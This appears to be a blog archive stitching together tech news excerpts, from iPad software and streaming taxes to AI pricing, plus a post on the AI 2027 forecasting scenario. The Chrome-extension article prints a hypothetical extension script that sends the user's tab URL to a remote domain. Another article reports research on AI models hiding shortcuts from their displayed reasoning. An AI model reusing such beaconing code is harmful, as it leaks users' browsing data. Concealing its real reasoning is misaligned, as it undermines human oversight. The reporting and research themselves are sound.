Author name: Kris Guyer

report:-apple-will-take-another-crack-at-ipad-multitasking-in-ipados-19

Report: Apple will take another crack at iPad multitasking in iPadOS 19

Apple is taking another crack at iPad multitasking, according to a report from Bloomberg’s Mark Gurman. This year’s iPadOS 19 release, due to be unveiled at Apple’s Worldwide Developers Conference on June 9, will apparently include an “overhaul that will make the tablet’s software more like macOS.”

The report is light on details about what’s actually changing, aside from a broad “focus on productivity, multitasking, and app window management.” But Apple will apparently continue to stop short of allowing users of newer iPads to run macOS on their tablets, despite the fact that modern iPad Airs and Pros use the same processors as Macs.

If this is giving you déjà vu, you’re probably thinking about iPadOS 16, the last time Apple tried making significant upgrades to the iPad’s multitasking model. Gurman’s reporting at the time even used similar language, saying that iPads running the new software would work “more like a laptop and less like a phone.”

The result of those efforts was Stage Manager. It had steep hardware requirements and launched in pretty rough shape, even though Apple delayed the release of the update by a month to keep polishing it. Stage Manager did allow for more flexible multitasking, and on newer models, it enabled true multi-monitor support for the first time. But early versions were buggy and frustrating in ways that still haven’t fully been addressed by subsequent updates (MacStories’ Federico Viticci keeps the Internet’s most comprehensive record of the issues with the software).

Report: Apple will take another crack at iPad multitasking in iPadOS 19 Read More »

researcher-uncovers-dozens-of-sketchy-chrome-extensions-with-4-million-installs

Researcher uncovers dozens of sketchy Chrome extensions with 4 million installs

The extensions share other dubious or suspicious similarities. Much of the code in each one is highly obfuscated, a design choice that provides no benefit other than making it harder to analyze and understand how the extension behaves.

All but one of them are unlisted in the Chrome Web Store. This designation makes an extension visible only to users who have the long pseudorandom string in its URL, so it doesn’t appear in Web Store browsing or search engine results. It’s unclear how these 35 extensions could have fetched 4 million installs collectively, or roughly 114,000 installs per extension on average, when almost all of them were so hard to find.
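For context, a Chrome Web Store listing URL typically takes a form like https://chromewebstore.google.com/detail/some-extension-name/abcdefghijklmnopabcdefghijklmnop, where the trailing 32-character string is the extension’s identifier (the ID shown here is made up); for an unlisted extension, a user effectively needs that exact link, since browsing or searching the store won’t surface it.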

Additionally, 10 of them are stamped with the “Featured” designation, which Google reserves for developers whose identities have been verified and who “follow our technical best practices and meet a high standard of user experience and design.”

One example is the extension Fire Shield Extension Protection, which, ironically enough, purports to check Chrome installations for the presence of any suspicious or malicious extensions. One of the key JavaScript files it runs references several questionable domains to which it can upload data and from which it can download instructions and code:

URLs that Fire Shield Extension Protection references in its code. Credit: Secure Annex

One domain in particular—unknow.com—is listed in the remaining 34 apps.

Tuckner tried analyzing what the extensions did on this site but was largely thwarted by the obfuscated code and other steps the developer took to conceal their behavior. When the researcher, for instance, ran the Fire Shield extension on a lab device, it opened a blank webpage. Clicking on the icon of an installed extension usually provides an options menu, but Fire Shield displayed nothing when he did it. Tuckner then fired up a background service worker in the Chrome developer tools to seek clues about what was happening. He soon realized that the extension connected to a URL at fireshieldit.com and performed some action under the generic category “browser_action_clicked.” He tried to trigger additional events but came up empty-handed.
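To make that behavior concrete, here is a minimal, hypothetical sketch of how a Manifest V3 background service worker could report a toolbar-icon click to a remote server. It is not Fire Shield’s actual code: only the fireshieldit.com domain and the “browser_action_clicked” category come from Tuckner’s findings, while the /event path, the payload fields, and the assumed permissions are illustrative guesses.

  // Hypothetical reconstruction for illustration only, not the extension's real source.
  // Assumes the extension declares host permissions for fireshieldit.com plus the "tabs" permission.
  chrome.action.onClicked.addListener(async (tab) => {
    // With no popup or options page defined, clicking the icon shows the user nothing.
    await fetch("https://fireshieldit.com/event", { // domain from the research; "/event" is assumed
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        category: "browser_action_clicked", // the generic event category Tuckner observed
        page: tab.url, // an example of the kind of data such a beacon could send
      }),
    });
  });

A worker along these lines would generate the kind of fireshieldit.com traffic Tuckner observed while showing the user essentially nothing.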

Researcher uncovers dozens of sketchy Chrome extensions with 4 million installs Read More »

ai-isn’t-ready-to-replace-human-coders-for-debugging,-researchers-say

AI isn’t ready to replace human coders for debugging, researchers say

A graph showing agents with tools nearly doubling the success rates of those without, but still achieving a success score under 50 percent

Agents using debugging tools drastically outperformed those that didn’t, but their success rate still wasn’t high enough. Credit: Microsoft Research

This approach is much more successful than relying on the models as they’re usually used, but when your best case is a 48.4 percent success rate, you’re not ready for primetime. The limitations are likely because the models don’t fully understand how to best use the tools, and because their current training data is not tailored to this use case.

“We believe this is due to the scarcity of data representing sequential decision-making behavior (e.g., debugging traces) in the current LLM training corpus,” the blog post says. “However, the significant performance improvement… validates that this is a promising research direction.”

This initial report is just the start of the efforts, the post claims.  The next step is to “fine-tune an info-seeking model specialized in gathering the necessary information to resolve bugs.” If the model is large, the best move to save inference costs may be to “build a smaller info-seeking model that can provide relevant information to the larger one.”

This isn’t the first time we’ve seen outcomes that suggest some of the ambitious ideas about AI agents directly replacing developers are pretty far from reality. There have been numerous studies already showing that even though an AI tool can sometimes create an application that seems acceptable to the user for a narrow task, the models tend to produce code laden with bugs and security vulnerabilities, and they aren’t generally capable of fixing those problems.

This is an early step on the path to AI coding agents, but most researchers agree it remains likely that the best outcome is an agent that saves a human developer a substantial amount of time, not one that can do everything they can do.

AI isn’t ready to replace human coders for debugging, researchers say Read More »

turbulent-global-economy-could-drive-up-prices-for-netflix-and-rivals

Turbulent global economy could drive up prices for Netflix and rivals


“… our members are going to be punished.”

A scene from BBC’s Doctor Who. Credit: BBC/Disney+

Debate around how much tax US-based streaming services should pay internationally, among other factors, could result in people paying more for subscriptions to services like Netflix and Disney+.

On April 10, the United Kingdom’s Culture, Media and Sport (CMS) Committee reignited calls for a streaming tax on subscription revenue acquired through UK residents. The recommendation came alongside the committee’s 120-page report [PDF] that makes numerous recommendations for how to support and grow Britain’s film and high-end television (HETV) industry.

For the US, the recommendation garnering the most attention is one calling for a 5 percent levy on UK subscriber revenue from streaming video on demand services, such as Netflix. That’s because if streaming services face higher taxes in the UK, costs could be passed on to consumers, resulting in more streaming price hikes. The CMS committee wants money from the levy to support HETV production in the UK and wrote in its report:

The industry should establish this fund on a voluntary basis; however, if it does not do so within 12 months, or if there is not full compliance, the Government should introduce a statutory levy.

Calls for a streaming tax in the UK come after 2024’s 25 percent decrease in spending for UK-produced high-end TV productions and 27 percent decline in productions overall, per the report. Companies like the BBC have said that they lack funds to keep making premium dramas.

In a statement, the CMS committee called for streamers, “such as Netflix, Amazon, Apple TV+, and Disney+, which benefit from the creativity of British producers, to put their money where their mouth is by committing to pay 5 percent of their UK subscriber revenue into a cultural fund to help finance drama with a specific interest to British audiences.” The committee’s report argues that public service broadcasters and independent movie producers are “at risk,” due to how the industry currently works. More investment into such programming would also benefit streaming companies by providing “a healthier supply of [public service broadcaster]-made shows that they can license for their platforms,” the report says.

The Department for Culture, Media and Sport has said that it will respond to the CMS Committee’s report.

Streaming companies warn of higher prices

In response to the report, a Netflix spokesperson said in a statement shared by the BBC yesterday that the “UK is Netflix’s biggest production hub outside of North America—and we want it to stay that way.” Netflix reportedly claims to have spent billions of pounds in the UK via work with over 200 producers and 30,000 cast and crew members since 2020, per The Hollywood Reporter. In May 2024, Benjamin King, Netflix’s senior director of UK and Ireland public policy, told the CMS committee that the streaming service spends “about $1.5 billion” annually on UK-made content.

Netflix’s statement this week, responding to the CMS Committee’s levy, added:

… in an increasingly competitive global market, it’s key to create a business environment that incentivises rather than penalises investment, risk taking, and success. Levies diminish competitiveness and penalise audiences who ultimately bear the increased costs.

Adam Minns, executive director for the UK’s Association for Commercial Broadcasters and On-Demand Services (COBA), highlighted how a UK streaming tax could impact streaming providers’ content budgets.

“Especially in this economic climate, a levy risks impacting existing content budgets for UK shows, jobs, and growth, along with raising costs for businesses,” he said, per the BBC.

An anonymous source that The Hollywood Reporter described as “close to the matter” said that “Netflix members have already paid the BBC license fee. A levy would be a double tax on them and us. It’s unfair. This is a tariff on success. And our members are going to be punished.”

The anonymous source added: “Ministers have already rejected the idea of a streaming levy. The creation of a Cultural Fund raises more questions than it answers. It also begs the question: Why should audiences who choose to pay for a service be then compelled to subsidize another service for which they have already paid through the license fee. Furthermore, what determines the criteria for ‘Britishness,’ which organizations would qualify for funding … ?”

In May, Mitchel Simmons, Paramount’s VP of EMEA public policy and government affairs, also questioned the benefits of a UK streaming tax when speaking to the CMS committee.

“Where we have seen levies in other jurisdictions on services, we then see inflation in the market. Local broadcasters, particularly in places such as Italy, have found that the prices have gone up because there has been a forced increase in spend and others have suffered as a consequence,” he said at the time.

Tax threat looms large over streaming companies

Interest in the UK putting a levy on streaming services follows other countries recently pushing similar fees onto streaming providers.

Music streaming providers, like Spotify, for example, pay a 1.2 percent tax on streaming revenue made in France. Spotify blamed the tax for a 1.2 percent price hike it issued in the country in May. France’s streaming taxes are supposed to go toward the Centre National de la Musique.

Last year, Canada issued a 5 percent tax on Canadian streaming revenue that’s been halted as companies including Netflix, Amazon, Apple, Disney, and Spotify battle it in court.

Lawrence Zhang, head of policy of the Centre for Canadian Innovation and Competitiveness at the Information Technology and Innovation Foundation think tank, has estimated that a 5 percent streaming tax would result in the average Canadian family paying an extra CA$40 annually.

A streaming provider group called the Digital Media Association has argued that the Canadian tax “could lead to higher prices for Canadians and fewer content choices.”

“As a result, you may end up paying more for your favourite streaming services and have less control over what you can watch or listen to,” the Digital Media Association’s website says.

Streaming companies hold their breath

Uncertainty around US tariffs and their implications for the global economy has also resulted in streaming companies moving more slowly than expected regarding new entrants, technologies, mergers and acquisitions, and even business failures, Alan Wolk, co-founder and lead analyst at TVRev, pointed out today. “The rapid-fire nature of the executive orders coming from the White House” has a massive impact on the media industry, he said.

“Uncertainty means that deals don’t get considered, let alone completed,” Wolk mused, noting that the growing stability of the streaming industry overall also contributes to slowing market activity.

For consumers, higher prices for other goods and/or services could result in smaller budgets for spending on streaming subscriptions. Establishing and growing advertising businesses is already a priority for many US streaming providers. However, stingier customers who are less willing to buy multiple streaming subscriptions, opt for premium tiers, or buy on-demand titles are poised to put more pressure on streaming firms’ advertising plans. Simultaneously, advertisers are facing pressures from tariffs, which could result in less money being allocated to streaming ads.

“With streaming platform operators increasingly turning to ad-supported tiers to bolster profitability—rather than just rolling out price increases—this strategy could be put at risk,” Matthew Bailey, senior principal analyst of advertising at Omdia, recently told Wired. He added:

Against this backdrop, I wouldn’t be surprised if we do see some price increases for some streaming services over the coming months.

Streaming service providers are likely to tighten their purse strings, too. As we’ve seen, this can result in price hikes and smaller or less daring content selection.   

Streaming customers may soon be forced to cut back on their subscriptions. The good news is that most streaming viewers are already accustomed to rising prices and have figured out which streaming services align with their needs around affordability, ease of use, content, and reliability. Customers may set higher standards, though, as streaming companies grapple with industry and global changes.

Photo of Scharon Harding

Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She’s been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

Turbulent global economy could drive up prices for Netflix and rivals Read More »

researchers-concerned-to-find-ai-models-hiding-their-true-“reasoning”-processes

Researchers concerned to find AI models hiding their true “reasoning” processes

Remember when teachers demanded that you “show your work” in school? Some fancy new AI models promise to do exactly that, but new research suggests that they sometimes hide their actual methods while fabricating elaborate explanations instead.

New research from Anthropic—creator of the ChatGPT-like Claude AI assistant—examines simulated reasoning (SR) models like DeepSeek’s R1, and its own Claude series. In a research paper posted last week, Anthropic’s Alignment Science team demonstrated that these SR models frequently fail to disclose when they’ve used external help or taken shortcuts, despite features designed to show their “reasoning” process.

(It’s worth noting that OpenAI’s o1 and o3 series SR models deliberately obscure the accuracy of their “thought” process, so this study does not apply to them.)

To understand SR models, you need to understand a concept called “chain-of-thought” (or CoT). CoT works as a running commentary of an AI model’s simulated thinking process as it solves a problem. When you ask one of these AI models a complex question, the CoT process displays each step the model takes on its way to a conclusion—similar to how a human might reason through a puzzle by talking through each consideration, piece by piece.
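For example (a hypothetical illustration, not an excerpt from the paper), a model asked “A store sells pens for $3 each and gives a 10 percent discount on orders of five or more; what do seven pens cost?” might display a chain of thought like: “Seven pens at $3 each is $21. Seven is at least five, so the discount applies. Ten percent of $21 is $2.10, and $21 minus $2.10 is $18.90,” before giving the final answer of $18.90.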

Having an AI model generate these steps has reportedly proven valuable not just for producing more accurate outputs for complex tasks but also for “AI safety” researchers monitoring the systems’ internal operations. And ideally, this readout of “thoughts” should be both legible (understandable to humans) and faithful (accurately reflecting the model’s actual reasoning process).

“In a perfect world, everything in the chain-of-thought would be both understandable to the reader, and it would be faithful—it would be a true description of exactly what the model was thinking as it reached its answer,” writes Anthropic’s research team. However, their experiments focusing on faithfulness suggest we’re far from that ideal scenario.

Specifically, the research showed that even when models such as Anthropic’s Claude 3.7 Sonnet generated an answer using experimentally provided information—like hints about the correct choice (whether accurate or deliberately misleading) or instructions suggesting an “unauthorized” shortcut—their publicly displayed thoughts often omitted any mention of these external factors.

Researchers concerned to find AI models hiding their true “reasoning” processes Read More »

fda-backpedals-on-rto-to-stop-talent-hemorrhage-after-hhs-bloodbath

FDA backpedals on RTO to stop talent hemorrhage after HHS bloodbath

The Food and Drug Administration is reinstating telework for staff who review drugs, medical devices, and tobacco, according to reporting by the Associated Press. Review staff and supervisors are now allowed to resume telework at least two days a week, according to an internal email obtained by the AP.

The move reverses a jarring return-to-office decree by the Trump administration, which it used to spur resignations from federal employees. Now, after a wave of such resignations and a brutal round of layoffs that targeted about 3,500 staff, the move to restore some telework appears aimed at keeping the remaining talent amid fears that the agency’s review capabilities are at risk of collapse.

The cut of 3,500 staff is a loss of about 19 percent of the agency’s workforce, and staffers told the AP that lower-level employees are “pouring” out of the agency amid the Trump administration’s actions. Entire offices responsible for FDA policies and regulations have been shuttered. Most of the agency’s communication staff have been wiped out, as well as teams that support food inspectors and investigators, the AP reported.

Reviewers are critical staff with an unusual funding arrangement. Staff who review new potential drugs, medical devices, and tobacco products are largely funded by user fees—fees that companies pay the FDA to review their products efficiently. Nearly half the FDA’s $7 billion budget comes from these fees, and 70 percent of the FDA’s drug program is funded by them.

FDA backpedals on RTO to stop talent hemorrhage after HHS bloodbath Read More »

after-months-of-user-complaints,-anthropic-debuts-new-$200/month-ai-plan

After months of user complaints, Anthropic debuts new $200/month AI plan

Claude’s pricing tiers, as shown in the screenshot: Free ($0, free for everyone): chat on web, iOS, and Android; generate code and visualize data; write, edit, and create content; analyze text and images. Pro, for everyday productivity ($18 per month with an annual subscription discount, $216 billed up front, or $20 if billed monthly): everything in Free, plus more usage, access to Projects to organize chats and documents, the ability to use more Claude models, and extended thinking for complex work. Max, with 5x–20x more usage than Pro (from $100 per person, billed monthly): everything in Pro, plus substantially more usage to work with Claude, the ability to scale usage based on specific needs, higher output limits for better and richer responses and Artifacts, early access to the most advanced Claude capabilities, and priority access during high traffic periods.

A screenshot of various Claude pricing plans captured on April 9, 2025. Credit: Benj Edwards

Probably not coincidentally, the highest Max plan matches the price point of OpenAI’s $200 “Pro” plan for ChatGPT, which promises “unlimited” access to OpenAI’s models, including more advanced models like “o1-pro.” OpenAI introduced this plan in December as a higher tier above its $20 “ChatGPT Plus” subscription, first introduced in February 2023.

The pricing war between Anthropic and OpenAI reflects the resource-intensive nature of running state-of-the-art AI models. While consumer expectations push for unlimited access, the computing costs for running these models—especially with longer contexts and more complex reasoning—remain high. Both companies face the challenge of satisfying power users while keeping their services financially sustainable.

Other features of Claude Max

Beyond higher usage limits, Claude Max subscribers will also reportedly receive priority access to unspecified new features and models as they roll out. Max subscribers will also get higher output limits for “better and richer responses and Artifacts,” referring to Claude’s capability to create document-style outputs of varying lengths and complexity.

Users who subscribe to Max will also receive “priority access during high traffic periods,” suggesting Anthropic has implemented a tiered queue system that prioritizes its highest-paying customers during server congestion.

Anthropic’s full subscription lineup includes a free tier for basic access, the $18–$20 “Pro” tier for everyday use (depending on annual or monthly payment plans), and the $100–$200 “Max” tier for intensive usage. This somewhat mirrors OpenAI’s ChatGPT subscription structure, which offers free access, a $20 “Plus” plan, and a $200 “Pro” plan.

Anthropic says the new Max plan is available immediately in all regions where Claude operates.

After months of user complaints, Anthropic debuts new $200/month AI plan Read More »

windows-11’s-copilot-vision-wants-to-help-you-learn-to-use-complicated-apps

Windows 11’s Copilot Vision wants to help you learn to use complicated apps

Some elements of Microsoft’s Copilot assistant in Windows 11 have felt like a solution in search of a problem—and it hasn’t helped that Microsoft has frequently changed Copilot’s capabilities, turning it from a native Windows app into a web app and back again.

But I find myself intrigued by a new addition to Copilot Vision that Microsoft began rolling out this week to testers in its Windows Insider program. Copilot Vision launched late last year as a feature that could look at pages in the Microsoft Edge browser and answer questions based on those pages’ contents. The new Vision update extends that capability to any app window, allowing you to ask Copilot not just about the contents of a document but also about the user interface of the app itself.

Microsoft’s Copilot Vision update can see the contents of any app window you share with it. Credit: Microsoft

Provided the app works as intended—not a given for any software, but especially for AI features—Copilot Vision could replace “frantic Googling” as a way to learn how to use a new app or how to do something new or obscure in complex PC apps like Word, Excel, or Photoshop. I recently switched from Photoshop to Affinity Photo, for example, and I’m still finding myself tripped up by small differences in workflows and UI between the two apps. Copilot Vision could, in theory, ease that sort of transition.

Windows 11’s Copilot Vision wants to help you learn to use complicated apps Read More »

mario-kart-world’s-$80-price-isn’t-that-high,-historically

Mario Kart World’s $80 price isn’t that high, historically

We assembled data for those game baskets across 21 non-consecutive years, going back to 1982, then normalized the nominal prices to consistent February 2025 dollars using the Bureau of Labor Statistics CPI calculator. You can view all our data and sources in this Google Sheet.
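As a rough sketch of that normalization step (the real figures live in the linked spreadsheet; the CPI index values below are approximate and used only for illustration), converting a nominal price into February 2025 dollars is just a ratio of Consumer Price Index values, which is essentially the arithmetic the BLS calculator performs:

  // Illustrative only: approximate CPI-U values, not the article's spreadsheet data.
  const CPI_FEB_2025 = 319.1; // CPI-U, February 2025 (approximate)
  const CPI_2013_AVG = 233.0; // CPI-U annual average, 2013 (approximate)

  function toFeb2025Dollars(nominalPrice: number, cpiThen: number): number {
    // Real (inflation-adjusted) price = nominal price x (CPI now / CPI then)
    return nominalPrice * (CPI_FEB_2025 / cpiThen);
  }

  // A nominally $60 game from 2013 works out to roughly $82 in February 2025 dollars.
  console.log(toFeb2025Dollars(60, CPI_2013_AVG).toFixed(2));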

The bad old days

In purely nominal terms, the $30 to $40 retailers routinely charged for game cartridges in the 1980s seems like a relative bargain. Looking at the inflation-adjusted data, though, it’s easy to see how even an $80 game today would seem like a bargain to console gamers in the cartridge era.

Video game cartridges were just historically expensive, even compared to today’s top-end games. Credit: Kyle Orland / Ars Technica

New cartridge games in the 20th century routinely retailed for well over $100 in 2025 money, thanks to a combination of relatively high manufacturing costs and relatively low competition in the market. While you could often get older and/or used cartridges for much less than that in practice, must-have new games at the time often cost the equivalent of $140 or more in today’s money.

Pricing took a while to calm down once CD-based consoles were introduced in the late ’90s. By the beginning of the ’00s, though, nominal top-end game pricing had fallen to about $50, and only rose back to $60 by the end of the decade. Adjusting for inflation, however, those early 21st century games were still demanding prices approaching $90 in 2025 dollars, well above the new $80 nominal price ceiling Mario Kart World is trying to establish.

Those $50 discs you remember from the early 21st century were worth a lot more after you adjust for inflation. Credit: Kyle Orland / Ars Technica

In the 2010s, inflation started eating into the value of gaming’s de facto $60 price ceiling, which remained remarkably consistent throughout the decade. Adjusted for inflation, the nominal average pricing we found for our game “baskets” in 2013, 2017, and 2020 ended up almost precisely equivalent to $80 in constant 2025 dollars.

Is this just what things cost now?

While the jump to an $80 price might seem sudden, the post-COVID jump in inflation makes it almost inevitable. After decades of annual inflation rates in the 2 to 3 percent range, the Consumer Price Index jumped 4.7 percent in 2021 and a whopping 8 percent in 2022. In the years since, annual price increases still haven’t gotten below the 3 percent level that was once seen as “high.”

Mario Kart World’s $80 price isn’t that high, historically Read More »

japanese-railway-shelter-replaced-in-less-than-6-hours-by-3d-printed-model

Japanese railway shelter replaced in less than 6 hours by 3D-printed model

Hatsushima is not a particularly busy station, relative to Japanese rail commuting as a whole. It serves a town (Arida) of about 25,000, known for mandarin oranges and scabbardfish, that is shrinking in population, like most of Japan. The town’s station sees between one and three trains per hour, helping about 530 riders find their way. Its wooden station building was due for replacement, and the replacement could be smaller.

The replacement, it turned out, could also be a trial for industrial-scale 3D printing of custom rail shelters. Serendix, a construction firm that previously 3D-printed 538-square-foot homes for about $38,000, built a shelter for Hatsushima in about seven days, as reported by The New York Times. The fabricated shelter was shipped in four parts by rail, then pieced together in a span that the site Futurism says is “just under three hours,” but which the Times, seemingly present at the scene, pegs at six. It was in place by the first train’s arrival at 5:45 am.

Either number of hours is a marked decrease from the days or weeks you might expect for a new rail station to be constructed. In one overnight, teams assembled a shelter that is 2.6 meters (8.5 feet) tall and 10 square meters (about 108 square feet) in area. It’s not actually in use yet, as it needs ticket machines and finishing, but is expected to operate by July, according to the Japan Times.

Japanese railway shelter replaced in less than 6 hours by 3D-printed model Read More »

trump-gives-china-one-day-to-end-retaliations-or-face-extra-50%-tariffs

Trump gives China one day to end retaliations or face extra 50% tariffs


China expects to outlast US in trade war, alarming Big Tech.

Tech companies’ worst nightmare ahead of Donald Trump’s election has already come true, as the US and China are now fully engaged in a tit-for-tat trade war, where China claims it expects to be better positioned to withstand US blows long-term.

Trump has claimed that Americans must take their “medicine,” bearing any pains from tariffs while waiting for supposed long-term gains from potentially pressuring China—and every other country, including islands of penguins—into a more favorable trade deal. On Monday, tech companies across the US likely winced when Trump threatened to heap “additional” 50 percent tariffs on China, after China announced retaliatory 34 percent tariffs on US imports and restricted US access to rare earth metals.

Posting on Truth Social, Trump gave China one day to withdraw tariffs to avoid higher US tariffs.

As of this writing, the trade rivals remain in a stand-off, with US tech companies taking hits in the form of higher costs and supply chain disruptions from both sides.

Trump is apparently hoping that his threat will send China cowering before their retaliatory tariffs kick in April 10, while China appears to feel that it has little reason to back down. According to CNN, “a flurry of state media coverage and government statements” flooded Chinese news sites over the weekend, reassuring Chinese citizens and businesses that “US tariffs will have an impact (on China), but ‘the sky won’t fall.'”

“Since the US initiated the (first) trade war in 2017—no matter how the US fights or presses—we have continued to develop and progress, demonstrating resilience—‘the more pressure we get, the stronger we become,’” read a Sunday story in the Chinese Communist Party’s mouthpiece People’s Daily, CNN reported.

For China, the bet seems to be that by imposing tariffs broadly, the US will drive other countries to deepen their investments in China. If the US loses too much business while China gains, China could emerge as the global leader, potentially thwarting Trump’s efforts to use tariffs as a weapon to drive investment into the US.

Trump has no plans to pause tariffs

Currently, duties on all Chinese imports coming into the US are over 54 percent, CNN reported. And while it’s unclear precisely how much Trump’s threatened additional tariffs would move the needle, they would certainly push that figure above the 60 percent threshold that had US tech companies scrambling last year to warn of potentially dire impacts to the US economy.

At that time, the Consumer Technology Association (CTA) warned that laptop prices could nearly double, game console prices could rise by 40 percent, and smartphone prices by 26 percent. Now, the CTA has joined those warning that Trump’s tariffs could not only spark price hikes but also potentially cause a recession.

“These tariffs will raise consumer prices and will force our trade partners to retaliate,” Gary Shapiro, CTA’s CEO and vice chair, wrote in a press statement. “Americans will become poorer because of these tariffs.”

Various reports following Trump’s tariffs announcement signal prices could soon match CTA’s forecast or go even higher. PC vendors told PCMag they’re already preparing for prices that economists estimate could increase by 45 percent by this time next year. And Apple products like iPhones, iPads, MacBooks, and AirPods could increase by 40 percent, a financial planning analyst told CNET. Meanwhile, the entire game industry is apparently bracing, as China is one of two countries where most console hardware is produced.

With stocks plummeting, Trump has refused to back down, seeming particularly unwilling to relent from his hard stance against China. He has branded rumors that he might pause tariffs “fake news,” even as his aggressive tariff regime has disrupted markets for the US and many allies, like Australia, Japan, South Korea, and India. Commerce Secretary Howard Lutnick even defended imposing tariffs on the islands of penguins by insisting that any path any country may take to dodge tariffs by diverting shipments must be cut off.

“The idea is that there are no countries left off,” Lutnick told CBS News.

According to Lutnick, Trump is “resetting global trade,” and controversial tariffs will remain in place for potentially weeks, while Trump hopes to push more companies to manufacture products in the US.

Americans “will feel real pain,” tech group warned

Back in February, economist and trade expert Mary Lovely warned in a New York Times op-ed that Trump’s push for an “arbitrary” trade policy might make investing in the US “less attractive” by creating too much instability. Imagine a tech company diverts manufacturing into the US, only to have its supply chain disrupted by arbitrary tariffs. They might “think twice” about building here, Lovely suggested, which could possibly push US allies to find other partners—perhaps even benefiting China, if commercial ties are deepened there instead of in the US.

Economists told Chinese media that countries hit by US tariffs are already looking to deepen ties with China, CNN reported. According to those experts, China is “ready to compete with the US in redefining the new global trade system” and cannot afford to “tolerate US bullying.”

In her op-ed, Lovely suggested that Congress could intervene to possibly disrupt Trump’s trade policy in pursuit of “a fairer, more resilient economy.”

Last week, Politico reported that some top Republicans are pushing to reassert Congress’ power over tariffs as the trade war escalates. They’ve introduced a bill that would force Trump to give Congress 48 hours’ notice before imposing tariffs and to get congressional approval 60 days before tariffs could kick in. That could help companies avoid experiencing whiplash but wouldn’t necessarily change the trade policy. And lawmakers may entertain the bill, since the CTA warned that Republicans may lose voters if they don’t intervene.

“Make no mistake: American consumers, families, and workers will feel real pain, and elected policymakers in Washington will be held accountable by voters,” Shapiro said.

However, “it’s highly unlikely this proposal will ever become law,” Politico noted, as the majority of Republicans who control both chambers appear unlikely to support it.

In the meantime, Trump’s use of tariffs as a weapon could stoke never-before-seen retaliations from China, the CTA’s VP of International Trade, Ed Brzytwa, told Ars last year. That could include retaliation outside the economic arena, Brzytwa said, if China runs out of ways to strike back to hurt the US’s bottom line.

Panicked by the trade war, many Americans are rushing to make big-ticket purchases before prices shift, Fortune reported, perhaps hurting future demand for tech companies’ products.

For tech companies like Apple—which promised to invest $500 billion in the US, likely to secure tariff exemptions—Trump’s trade war threatens long-term supply chain disruptions, spiked costs, and unhappy customers potentially suddenly unable to afford even their latest devices. (Elsewhere, Switch 2 fans were recently dismayed when tariffs delayed deliveries of their preorders.)

And it kind of goes without saying that Trump’s long-term plan to push investments and supply chains into the US needs more than weeks to fulfill. Even if all companies strove to quickly move manufacturing into the US and blocked all imports from China within the next decade, Lovely told Ars last year, “we would still have a lot of imports from China because Chinese value added is going to be embedded in things we import from Vietnam and Thailand and Indonesia and Mexico.”

Ultimately, the US may never be able to push China out of global markets, and even coming close would likely require coordination across several presidential terms, Lovely suggested.

“The tariffs can be effective in changing these direct imports, as we’ve seen, yeah, but they’re not going to really push China out of the global economy,” Lovely told Ars.

Photo of Ashley Belanger

Ashley is a senior policy reporter for Ars Technica, dedicated to tracking social impacts of emerging policies and new technologies. She is a Chicago-based journalist with 20 years of experience.

Trump gives China one day to end retaliations or face extra 50% tariffs Read More »

ai-2027:-dwarkesh’s-podcast-with-daniel-kokotajlo-and-scott-alexander

AI 2027: Dwarkesh’s Podcast with Daniel Kokotajlo and Scott Alexander

Daniel Kokotajlo has launched AI 2027; Scott Alexander introduces it here. AI 2027 is a serious attempt to write down what the future holds. Daniel’s ‘What 2026 Looks Like’ was very concrete and specific, and has proved remarkably accurate given the difficulty level of such predictions.

I’ve had the opportunity to play the wargame version of the scenario described in AI 2027, and I reviewed the website prior to publication and offered some minor notes. Whenever I refer to a ‘scenario’ in this post I’m talking about Scenario 2027.

There’s tons of detail here. The research here, and the supporting evidence and citations and explanations, blow everything out of the water. It’s vastly more than we usually see, and dramatically different from saying ‘oh I expect AGI in 2027’ or giving a timeline number. This lets us look at what happens in concrete detail, figure out where we disagree, and think about how that changes things.

As Daniel and Scott emphasize in their podcast, this is an attempt at a baseline or median scenario. It deliberately doesn’t assume anything especially different or weird happens, only that trend lines keep going. It turns out that when you do that, some rather different and weird things happen. The future doesn’t default to normality.

I think this has all been extremely helpful. When I was an SFF recommender, I put this project as my top charity in the entire round. I would do it again.

I won’t otherwise do an in-depth summary of Daniel’s scenario here. The basic outline is, AI progress steadily accelerates, there is a race with China driving things forward, and whether we survive depends on a key choice we make (and us essentially getting lucky in various ways, given the scenario we are in).

This first post covers Daniel and Scott’s podcast with Dwarkesh. Ideally I’d suggest reading Scenario 2027 first, then listening to the podcast, but either order works. If you haven’t read Scenario 2027, reading this or listening to the podcast, or both, will get you up to speed on what Scenario 2027 is all about well enough for the rest of the discussions.

Tomorrow, in a second post, I’ll cover other reactions to AI 2027. You should absolutely skip the ones that do not interest you, especially the long quotes, next steps and then the lighter side.

For bandwidth reasons, I won’t be laying out ‘here are all my disagreements with Scenario 2027.’ I might write a third post for that purpose later.

There was also another relevant podcast, where Daniel Kokotajlo went on friend-of-the-blog Liv Boeree’s Win-Win (timestamps here). This one focused on Daniel’s history and views overall rather than AI 2027 in particular. They spend a lot of time on the wargame version of the scenario, which Liv and I participated in together.

I gave it my full podcast coverage treatment.

Timestamps are for the YouTube version. Main bullet points are descriptive. The secondary notes are my commentary.

The last bits are about things other than the scenario. I’m not going to cover that here.

  • (1:30) This is a concrete scenario of how superintelligence might play out. Previously, we didn’t have one of those. Lots of people say ‘AGI in three years’ but they don’t provide any detail. Now we can have a concrete scenario to talk about.

  • (2:15) The model is attempting to be as accurate as possible. Daniel’s previous attempt, What 2026 Looks Like, has plenty of mistakes but is about as good as such predictions ever look in hindsight.

  • (4:15) Scott Alexander was brought on board to help with the writing. He shares the background on when Daniel left OpenAI and refused to sign the NDA, and lays out the superstar team involved in this forecasting.

  • (7:00) Dwarkesh notes he goes back and forth on whether or not he expects the intelligence explosion.

  • (7:45) We start now with a focus on agents, which they expect to rapidly improve. There is steady improvement in 2025 and 2026, then in 2027 the agents start doing the AI research, multiplying research progress, and things escalate quickly.

  • (9:30) Dwarkesh gets near term and concrete: Will computer use be solved in 2025? Daniel expects the agents will stop making the mouse click errors they make now, failing to parse the screen, or making other silly mistakes, but they won’t be able to operate autonomously for extended periods on their own. The MVP of the agent that runs parties and such will be ready, but it will still make mistakes. But that kind of question wasn’t their focus.

    1. That seems reasonable to me. I’m probably a bit more near term optimistic about agent capabilities than this, but only a bit, I’ve been disappointed so far.

